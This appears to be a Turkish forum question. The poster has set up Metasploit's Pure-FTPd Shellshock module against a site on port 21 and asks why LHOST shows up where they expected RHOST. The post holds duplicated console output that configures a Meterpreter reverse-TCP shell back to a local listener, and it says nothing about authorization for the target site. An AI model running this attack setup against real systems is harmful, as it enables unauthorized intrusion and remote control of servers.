Metasploit ile siteye 21 portu üzerinden exploit atarken versiona uygun exploiti bulduğum halde RHOST çıkması gerekirken LHOST çıkıyor
msf6 > search Pure-FTPd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/ftp/pureftpd_bash_env_exec 2014-09-24 excellent Yes Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/ftp/pureftpd_bash_env_exec
msf6 > use 0
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/ftp/pureftpd_bash_env_exec) > set payload
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/ftp/pureftpd_bash_env_exec) > show options
Module options (exploit/multi/ftp/pureftpd_bash_env_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see Using Metasploit · rapid7/metasploit-framework Wiki
RPATH /bin yes Target PATH for binaries used by the CmdStager
RPORT 21 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine
or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.34 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux x86
msf6 > search Pure-FTPd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/ftp/pureftpd_bash_env_exec 2014-09-24 excellent Yes Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/ftp/pureftpd_bash_env_exec
msf6 > use 0
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/ftp/pureftpd_bash_env_exec) > set payload
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/ftp/pureftpd_bash_env_exec) > show options
Module options (exploit/multi/ftp/pureftpd_bash_env_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see Using Metasploit · rapid7/metasploit-framework Wiki
RPATH /bin yes Target PATH for binaries used by the CmdStager
RPORT 21 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine
or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.34 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux x86